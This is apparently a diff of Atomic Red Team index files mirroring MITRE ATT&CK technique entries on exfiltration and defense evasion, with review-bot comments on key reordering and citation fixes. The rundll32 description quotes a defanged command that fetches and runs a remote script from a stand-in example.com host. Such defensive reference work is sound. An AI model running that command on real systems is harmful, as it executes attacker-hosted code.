+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -66844,8 +67742,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -66853,13 +67753,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -66890,14 +67790,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
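Review bot: in T1078.004, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are deleted at the end of the object here and re-inserted earlier (after `phase_name: initial-access` and after `x_mitre_is_subtechnique`), while in T1078 above the same two keys move in the opposite direction. The semantic change is nil, but the generator evidently preserves source key order; sorting keys on dump would keep future diffs down to the real changes.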
@@ -66964,11 +67861,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -67020,9 +67916,8 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges - MacOS
@@ -67086,7 +67981,7 @@ initial-access:
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -67110,10 +68005,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -67132,13 +68026,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -67177,9 +68070,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -67229,7 +68121,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -67249,7 +68140,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -67269,8 +68160,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
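Review bot: for T1029 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and, unlike T1078 or T1566, no `x_mitre_attack_spec_version` is added back; the same pattern recurs below for T1011.001, T1048.001, T1048.002, T1052.001, T1030 and T1052. Any consumer that reads that field to decide how to parse an object now finds it missing on these entries, so confirm the upstream objects really omit it.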
@@ -67317,7 +68206,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -67337,7 +68225,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -67359,8 +68247,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -67414,7 +68300,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -67439,7 +68324,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -67474,12 +68359,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -67504,11 +68387,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
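Review bot: `x_mitre_network_requirements: false` disappears from T1020.001 here (and from T1048 further down) with no corresponding change elsewhere. Grep the indexer and any downstream consumers for that key before merging, since any filter keyed on it will now behave differently for these techniques.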
@@ -67551,9 +68433,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -67600,7 +68481,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -67626,7 +68506,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -67659,8 +68539,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests:
- name: Exfiltrate data HTTPS using curl freebsd,linux or macos
@@ -67685,7 +68563,7 @@ exfiltration:
'
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -67734,12 +68612,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -67775,12 +68652,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -67789,7 +68665,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -67813,9 +68688,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -67889,7 +68763,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -67911,8 +68785,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -67963,7 +68835,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -68013,7 +68884,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -68038,7 +68908,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -68061,8 +68931,6 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
@@ -68105,7 +68973,7 @@ exfiltration:
name: sh
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -68146,9 +69014,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -68196,7 +69063,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -68218,7 +69084,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -68242,12 +69108,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -68311,7 +69175,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml
index ccb09cb9cb..4884f67596 100644
--- a/atomics/Indexes/office-365-index.yaml
+++ b/atomics/Indexes/office-365-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
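Review bot: the new T1027.011 description text cites `Akami Frog4Shell 2024` and `Sysdig Fileless Malware 23022`; both keys carry upstream typos (Akamai, 2022) but must stay as written, because citation keys are matched literally against `source_name` in `external_references`, and the matching entries added below use the same spellings. Correcting one side without the other would break citation resolution.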
@@ -200,6 +204,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
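Review bot: the new `Aquasec Muhstik Malware 2024` reference has a leading space inside its quoted description (`" Nitzan Yaakov. (2024, June 4)...`), which will render as a stray blank before the author name wherever the citation is displayed. It is upstream data, so the fix belongs in ATT&CK rather than in this generated file, but it is worth flagging.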
@@ -228,15 +243,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
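Review bot: the URL for `source_name: This is Security Command Line Confusion` is replaced (thisissecurity.stormshield.com -> www.stormshield.com/news/...) but the `Retrieved March 5, 2018.` line is kept, so the record now claims a 2018 retrieval of a page that did not exist under that URL then. The same pattern appears for `Mandiant M-Trends 2020` (content.fireeye.com -> www.mandiant.com, still "Retrieved April 24, 2020"), whereas the two Twitter -> x.com updates in this diff refresh the retrieval date to September 12, 2024 together with the URL. Either approach is defensible, but it should be one or the other; if these are mirrored upstream values, note the inconsistency upstream.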
@@ -327,9 +349,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests: []
T1027.009:
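Review bot: this hunk is the clearest instance of a change repeated across the whole diff: the STIX `spec_version: '2.1'` line is deleted from every technique object while `x_mitre_attack_spec_version` is bumped to 3.2.0. Dropping `spec_version` is fine if the consumers of this YAML (index generation, the Atomic Red Team site build) only read the `x_mitre_*` keys, but it should be confirmed that nothing parses these objects as STIX 2.1 and expects the field; a one-line mention in the commit message would save the next reader from diffing every object to work out whether the removal is systematic or accidental.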
@@ -419,49 +440,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
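Review bot: this hunk reads as a wholesale deletion of T1556.003 (platforms, domains, contributors, marking refs, id/type/created, external_references) but it is a key reorder: every removed block reappears in the following hunk of the same object in a different position, so the only real change visible here is the `modified` timestamp. Consider emitting the YAML with a stable key order (the later hunks for T1574.011 show the same churn) so that genuine content changes are not buried in reorder noise. Unrelated to this change, the context lines show the description scalar with line breaks before punctuation ("pam_unix.so\n, which retrieves" and "/etc/shadow\n."), a leftover of inline code formatting being stripped when the text was imported; worth fixing in the importer rather than here.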
@@ -476,20 +458,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
